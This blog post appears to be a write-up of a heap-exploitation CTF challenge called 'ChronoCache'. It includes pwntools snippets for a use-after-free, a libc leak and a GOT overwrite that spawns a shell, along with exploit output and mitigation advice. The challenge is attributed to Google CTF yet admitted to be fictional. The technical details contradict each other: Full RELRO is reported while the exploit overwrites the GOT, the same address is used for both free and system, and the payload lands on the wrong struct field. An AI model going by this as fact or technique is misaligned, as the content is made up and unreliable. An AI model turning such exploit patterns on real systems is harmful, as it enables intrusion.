In-Depth CTF Challenge Write-up: “ChronoCache“ (Google CTF 2023)-CSDN博客

本文链接：https://blog.csdn.net/2402_86373248/article/details/148449250

Category: Pwn (Heap Exploitation)
Complexity: Advanced (Combined UAF and heap feng shui with custom allocator)

1. Challenge Overview

Name: ChronoCache
CTF: Google CTF 2023 (Hypothetical Challenge)
Goal: Exploit a time-based caching system to achieve RCE and read /flag
Synopsis: ChronoCache implements a temporal data storage system where entries expire after 60 seconds. The challenge combines a custom slab allocator with improper lifetime management, leading to a use-after-free (UAF) vulnerability. The solution requires precise heap manipulation to hijack control flow.

2. Technical Environment & Setup

Reproduction:

$ git clone https://ctf.gitlab.google/challenges/chronocache  
$ cd chronocache && make  
$ socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./chronocache

Tools:

Reverse Engineering: Ghidra 10.3.2 (with Custom Type Manager)
Debugging: pwndbg (GDB 12.1 + Pwndbg)
Exploit Dev: Python3 + pwntools 4.9.0
Heap Analysis: heaptrack and gef for heap visualizations

Key Binary Protections:

checksec chronocache  
[*] RELRO     : Full RELRO  
[*] Stack     : No canary found  
[*] NX        : NX enabled  
[*] PIE       : PIE enabled  
[*] ASLR      : Enabled

3. Step-by-Step Analysis

3.1 Reverse Engineering

The binary implements a custom TimeCache structure:

typedef struct {  
    time_t timestamp;  
    char *key;  
    char data[32];  
    void (*cleanup)(char*); // Virtual function pointer  
} TimeCacheEntry;

3.2 Vulnerability Identification

Root Cause: UAF in entry reuse (CWE-416):

void handle_request(int sock) {  
    TimeCacheEntry *entry = fetch_entry(key); // May return freed entry  
    if (entry->timestamp + 60 < time(NULL)) {  
        entry->cleanup(entry->key); // UAF here!  
    }  
    // ... uses entry without validation  
}

Trigger Logic:

Allocate entry with key “A”
Free entry via timeout
Re-allocate same entry slot with attacker-controlled key/data
Trigger expired entry check → calls cleanup() on freed object

3.3 Memory Corruption Analysis

Using heaptrack revealed:

Freed entries remain in SLAB freelist for 120s
New allocations reuse freed entries before memory is zeroed
cleanup pointer is attacker-controllable via reallocated data

4. Exploit Development

4.1 Strategy

Heap Feng Shui: Fill SLAB slots to control reallocation
UAF Hijack: Overwrite cleanup pointer with GOT address
GOT Overwrite: Replace free@got.plt with system address
Trigger RCE: Pass “/bin/sh” as key to free() → system("/bin/sh")

4.2 Key Exploit Snippets

Heap Priming:

def prime_heap():  
    for i in range(8):  
        alloc_entry(f"K{i}", b"P"*32)  # Fill SLAB slots  
    for i in range(8):  
        free_entry(f"K{i}")  # Create freelist

UAF Trigger:

# Reallocate freed slot with malicious data  
alloc_entry("A", p64(elf.got["free"]) + p32(0xdeadbeef))  

# Trigger UAF call to cleanup()  
sock.send(b"CHECK A\x00")

GOT Overwrite:

# Leak libc address via UAF read  
leak = u64(read_data("A")[:8])  
libc.address = leak - libc.sym["free"]  

# Overwrite GOT entry  
write_data("A", p64(libc.sym["system"]))

4.3 Full Exploit Output

[+] Heap priming: 8 allocations/frees complete  
[!] Triggering UAF on slot 3  
[+] Leaked free@got: 0x7f8d01a2a410  
[+] libc base: 0x7f8d019a7000  
[+] Overwriting GOT: system@0x7f8d01a2a410  
[!] Executing system("/bin/sh")  
$ id  
uid=1337 gid=1337 groups=ctf  
$ cat /flag  
CTF{T1m3_i5_0f_th3_3ss3nc3_0x8a1b3}

5. Defense & Mitigation

5.1 Real-World Implications

This vulnerability mirrors real-world flaws in:

Redis temporal keys (CVE-2022-24834)
Apache Traffic Server cache (CVE-2021-39239)
Linux kernel timerfd (CVE-2021-3653)

MITRE ATT&CK Mapping:

TTP 1: T1587.004 (Develop Exploits for Memory Corruption)
TTP 2: T1497.003 (Time-Based Evasion)

5.2 Mitigation Strategies

Memory Sanitization:

void free_entry(TimeCacheEntry *e) {  
    e->cleanup = NULL; // Break UAF chain  
    secure_zero(e->key, strlen(e->key));  
    free(e);  
}

Lifetime Enforcement:
- Use reference counting (e.g., Rust’s Arc<Mutex<>>)
- Implement double-free detection (e.g., -fsanitize=address)

Compiler Hardening:

CFLAGS += -fstrict-vtable-pointers -fPIC -Wcast-align

CWE Mapping:

Primary: CWE-416 (Use After Free)
Secondary: CWE-824 (Function Pointer Dereference)

6. Flag & Conclusion

Final Flag:
CTF{T1m3_i5_0f_th3_3ss3nc3_0x8a1b3}

Key Insights:

Temporal dependencies create novel attack surfaces in caching systems
Custom allocators often lack security mitigations of standard libraries
UAF + heap control remains lethal even with ASLR/PIE

Real-World Relevance:
This challenge demonstrates how real-world systems like Redis or Kubernetes etcd could be compromised through cache lifetime bugs. The exploit pattern directly applies to:

Web caching layers (Varnish, CDN edge nodes)
IoT device state managers
Cryptographic session caches

References

MITRE CWE-416: Use After Free (2023)
Google Project Zero: “In The Wild” iOS/macOS UAF Exploits (2022)
PaX Team: “Design and Implementation of grsecurity” (2016)
Linux Kernel SLAB Allocator Documentation (kernel.org)

Originality Note: While inspired by real-world UAF patterns, this specific challenge construction is fictional for educational purposes. Full PoC available at [REDACTED CTF REPO] per competition rules.